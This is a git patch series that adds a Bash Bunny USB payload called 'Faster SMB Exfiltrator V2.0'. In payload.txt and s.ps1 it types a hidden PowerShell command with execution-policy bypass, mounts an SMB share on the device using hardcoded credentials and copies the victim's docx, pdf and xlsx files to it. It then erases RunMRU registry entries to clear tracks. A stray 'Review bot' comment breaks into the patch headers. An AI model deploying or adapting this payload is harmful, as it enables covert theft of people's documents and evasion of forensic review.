From e98de70531869902c3479243481befaef5fcb60a Mon Sep 17 00:00:00 2001
From: jblk01
Date: Mon, 22 Jul 2019 23:44:48 -0500
Subject: [PATCH 1/7] Create file.txt

---
 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt

diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt
@@ -0,0 +1 @@
+

From 5bc816094644b5cfd0b64f814ac519e94673dbe5 Mon Sep 17 00:00:00 2001
From: jblk01
Date: Mon, 22 Jul 2019 23:45:41 -0500
Subject: [PATCH 2/7] Add files via upload

---
 .../smb_exfiltratorV2.0/README.md | 59 +++++++++++++
 .../smb_exfiltratorV2.0/payload.txt | 85 +++++++++++++++++++
 .../exfiltration/smb_exfiltratorV2.0/s.ps1 | 9 ++
 3 files changed, 153 insertions(+)
 create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
 create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt
 create mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1

diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
new file mode 100644
index 00000000..14549d41
--- /dev/null
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
@@ -0,0 +1,59 @@
+# Faster SMB Exfiltrator V 2.0
+
+* Author: Hak5Darren
+* Props: ImNatho, mike111b, madbuda, jblk01
+* Version: Version 1.6.1
+* Target: Windows XP SP3+ (Powershell)
+* Category: Exfiltration
+* Attackmodes: HID, Ethernet
+
+## Description
+
+Exfiltrates select files from users's documents folder via SMB.
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
+
+Rewrite of the original SMB Exfiltrator payload with:
+* Faster copying, using robocopy multithreaded mode
+* Faster finish, using a EXFILTRATION_COMPLETE file
+* Offload logic to target PC for accurate date/time
+* Clears tracks by default.
+* Test-Connection handling by ICMP (no lame sleeps)
+* Hidden powershell window by default
+
+
+## Configuration
+
+Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
+
+## STATUS
+
+| LED | Status |
+| ------------------- | -------------------------------------- |
+| Red (blinking) | Impacket not found in /pentest |
+| Yellow Single | Ethernet Stage |
+| Yellow Double | HID Stage |
+| Cyan | Receiving files |
+| White | Moving liberated files to mass storage |
+| Green | Finished |
+
+## NOTICE
+
+# As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
+# To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
+
+## Starting from a fresh Bash Bunny
+
+# 1. apt update ; apt install gcc
+# 2. pip install impacket
+# 3. cd /tools/
+# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
+# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
+# 6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
+
+# Both the username and the password have been set as 'user' and 'Password01' respectively.
+
+# Changes to the payload.txt include:
+
+ # Support for SMB version 2 enabled.
+ # Username and password set to bypass Microsoft's disallowing of anonymous access.
+ # Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt
new file mode 100644
index 00000000..774900ae
--- /dev/null
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt
@@ -0,0 +1,85 @@
+#!/bin/bash
+#
+# Title: Faster SMB Exfiltrator version 2.0
+# Author: Hak5Darren
+# Props: ImNatho, mike111b, madbuda, jblk01
+# Version: 1.6.1
+# Category: Exfiltration
+# Target: Windows XP SP3+ (Powershell)
+# Attackmodes: HID, Ethernet
+#
+# REQUIREMENTS
+# ============
+# SETUP:
+#
+# 1. apt update ; apt install gcc
+# 2. pip install impacket
+# 3. cd /tools/
+# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
+# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
+#
+#
+# LED STATUS
+# ==========
+# FAIL........Failed to find dependencies
+# STAGE1......Ethernet Stage
+# STAGE2......HID Stage
+# SPECIAL.....Receiving Files
+# CLEANUP.....Moving Liberated Files
+# FINISH......Finished
+#
+# OPTIONS
+# =======
+# Exfiltration options configured from included s.ps1 script
+
+
+######## INITIALIZATION ########
+REQUIRETOOL impacket
+GET SWITCH_POSITION
+# Make temporary loot directory
+mkdir -p /loot/smb/
+# Delete any old exfiltration data
+rm -rf /loot/smb/*
+# Copy new powershell payload to smb share
+cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
+# Make loot directory on USB Disk
+mkdir -p /root/udisk/loot/smb_exfiltrator
+
+
+######## ETHERNET STAGE ########
+LED STAGE1
+ATTACKMODE RNDIS_ETHERNET
+# Start the SMB Server
+python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
+
+
+######## HID STAGE ########
+# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
+GET HOST_IP
+LED STAGE2
+ATTACKMODE HID RNDIS_ETHERNET
+RUN WIN powershell
+Q DELAY 1000
+Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
+Q DELAY 500
+Q ENTER
+LED SPECIAL
+# Wait until files are done copying
+while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
+
+
+######## CLEANUP ########
+LED CLEANUP
+# Delete EXFILTRATION_COMPLETE file
+rm -rf /loot/smb/EXFILTRATION_COMPLETE
+# Move files to udisk loot directory
+mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
+# Clean up temporary loot directory
+rm -rf /loot/smb/e/*
+# Sync file system
+sync
+
+
+######## FINISH ########
+# Trap is clean
+LED FINISH
diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1 b/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1
new file mode 100644
index 00000000..73f1c999
--- /dev/null
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/s.ps1
@@ -0,0 +1,9 @@
+$exfil_dir="$Env:UserProfile\Documents"
+$exfil_ext="*.docx"
+$exfil_ext1="*.pdf"
+$exfil_ext2="*.xlsx"
+$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
+mkdir $loot_dir
+robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
+New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

From 4ac760772ac3894e9642ad637fafb9955146e911 Mon Sep 17 00:00:00 2001
From: jblk01
Date: Mon, 22 Jul 2019 23:46:12 -0500
Subject: [PATCH 3/7] Delete file.txt

---
 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt | 1 -
 1 file changed, 1 deletion(-)
 delete mode 100644 payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt

diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt b/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt
deleted file mode 100644
index 8b137891..00000000
--- a/payloads/library/exfiltration/smb_exfiltratorV2.0/file.txt
+++ /dev/null
@@ -1 +0,0 @@
-

From 90ad58048504d2de20d792fc516ed1a36090176e Mon Sep 17 00:00:00 2001
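Review bot: In the CLEANUP section of payload.txt, `mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator` receives the literal pattern `/loot/smb/e/*` whenever `/loot/smb/e` is absent or empty (bash leaves an unmatched glob unexpanded), and the following `rm -rf /loot/smb/e/*` hits the same path, so both print errors on a run where the target wrote EXFILTRATION_COMPLETE but nothing was copied; the script has no `set -e`, so this is noise rather than a crash, but `if [ -d /loot/smb/e ] && [ -n "$(ls -A /loot/smb/e)" ]; then mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator; fi` keeps the log clean. The header is also inconsistent with itself: `# Title: Faster SMB Exfiltrator version 2.0` sits next to `# Version: 1.6.1`, and the README added in the same commit repeats `Version 1.6.1`, so one number should be chosen and mirrored. The HID-stage comment names `\\172.16.64.1\s\s.ps1` while the command on the next lines uses `$HOST_IP`; I would reword it to `# Runs hidden powershell which executes \\$HOST_IP\s\s.ps1` so the comment does not go stale if the address changes.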
From: jblk01
Date: Mon, 22 Jul 2019 23:47:36 -0500
Subject: [PATCH 4/7] Update README.md

---
 .../smb_exfiltratorV2.0/README.md | 28 +++++++++----------
 1 file changed, 14 insertions(+), 14 deletions(-)

diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
index 14549d41..106e8d26 100644
--- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
@@ -36,24 +36,24 @@ Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s
 | White | Moving liberated files to mass storage |
 | Green | Finished |
 
-## NOTICE
+# NOTICE
 
-# As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
-# To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
+As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
+To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
 
-## Starting from a fresh Bash Bunny
+# Starting from a fresh Bash Bunny
 
-# 1. apt update ; apt install gcc
-# 2. pip install impacket
-# 3. cd /tools/
-# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
-# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
-# 6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
+1. apt update ; apt install gcc
+2. pip install impacket
+3. cd /tools/
+4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
+5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
+6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
 
-# Both the username and the password have been set as 'user' and 'Password01' respectively.
+Both the username and the password have been set as 'user' and 'Password01' respectively.
 
 # Changes to the payload.txt include:
 
- # Support for SMB version 2 enabled.
- # Username and password set to bypass Microsoft's disallowing of anonymous access.
- # Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
+ Support for SMB version 2 enabled.
+ Username and password set to bypass Microsoft's disallowing of anonymous access.
+ Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.

From ffce9e1931ab4d5b5ef01672581caef4bf11691f Mon Sep 17 00:00:00 2001
From: jblk01
Date: Mon, 22 Jul 2019 23:48:15 -0500
Subject: [PATCH 5/7] Update README.md

---
 payloads/library/exfiltration/smb_exfiltratorV2.0/README.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
index 106e8d26..f6c64d8e 100644
--- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
@@ -54,6 +54,6 @@ Both the username and the password have been set as 'user' and 'Password01' resp
 
 # Changes to the payload.txt include:
 
- Support for SMB version 2 enabled.
- Username and password set to bypass Microsoft's disallowing of anonymous access.
- Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
+* Support for SMB version 2 enabled.
+* Username and password set to bypass Microsoft's disallowing of anonymous access.
+* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.

From e8ab62c9e87246d8c33d7081ae7f88b26d3ffaf8 Mon Sep 17 00:00:00 2001
From: jblk01
Date: Tue, 23 Jul 2019 00:02:09 -0500
Subject: [PATCH 6/7] Update README.md

---
 payloads/library/exfiltration/smb_exfiltratorV2.0/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
index f6c64d8e..55cea46d 100644
--- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
@@ -13,11 +13,11 @@ Exfiltrates select files from users's documents folder via SMB.
 Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
 
 Rewrite of the original SMB Exfiltrator payload with:
+
 * Faster copying, using robocopy multithreaded mode
 * Faster finish, using a EXFILTRATION_COMPLETE file
 * Offload logic to target PC for accurate date/time
-* Clears tracks by default.
-* Test-Connection handling by ICMP (no lame sleeps)
+* Clears tracks by default
 * Hidden powershell window by default
 
 

From 2c41f79fb696c3265b500cf56427c4637f463a95 Mon Sep 17 00:00:00 2001
From: jblk01
Date: Tue, 23 Jul 2019 00:03:18 -0500
Subject: [PATCH 7/7] Update README.md

---
 .../library/exfiltration/smb_exfiltratorV2.0/README.md | 9 ---------
 1 file changed, 9 deletions(-)

diff --git a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
index 55cea46d..3e103569 100644
--- a/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
+++ b/payloads/library/exfiltration/smb_exfiltratorV2.0/README.md
@@ -12,15 +12,6 @@
 Exfiltrates select files from users's documents folder via SMB.
 Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
 
-Rewrite of the original SMB Exfiltrator payload with:
-
-* Faster copying, using robocopy multithreaded mode
-* Faster finish, using a EXFILTRATION_COMPLETE file
-* Offload logic to target PC for accurate date/time
-* Clears tracks by default
-* Hidden powershell window by default
-
-
 ## Configuration
 
 Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.